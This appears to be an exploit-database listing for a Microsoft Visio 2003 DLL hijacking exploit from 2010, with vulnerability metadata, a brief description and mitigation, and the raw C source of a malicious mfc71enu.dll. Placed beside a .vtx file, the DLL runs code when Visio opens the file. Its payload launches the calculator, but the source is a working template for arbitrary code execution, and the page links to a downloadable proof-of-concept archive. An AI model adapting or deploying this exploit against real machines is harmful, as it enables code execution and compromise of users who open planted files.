header-logo
Suggest Exploit
vendor:
Visio
by:
Beenu Arora
9,3
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Visio
Affected Version From: Microsoft Visio 2003
Affected Version To: Microsoft Visio 2003
Patch Exists: NO
Related CWE: N/A
CPE: microsoft:visio:2003
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Microsoft Visio 2003 DLL Hijacking Exploit

This exploit is for Microsoft Visio 2003 and allows attackers to execute arbitrary code by hijacking a vulnerable DLL. The exploit is triggered by creating a file with the .vtx extension in the same directory as the malicious DLL. When the vulnerable application is launched, the malicious DLL is loaded and the code is executed.

Mitigation:

Ensure that vulnerable applications are not running with elevated privileges. Additionally, ensure that vulnerable applications are not running from directories with user-writable permissions.
Source

Exploit-DB raw data:

/* 
Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles , Dinesh Arora
Exploit Title: Microsoft Visio 2003 DLL Hijacking Exploit
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3
Vulnerable extensions: .vtx

Compile and rename to mfc71enu.dll, create a file in the same dir with one of the following extensions:
.vtx
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip

Navigation

Suggest Exploit

Services By CQR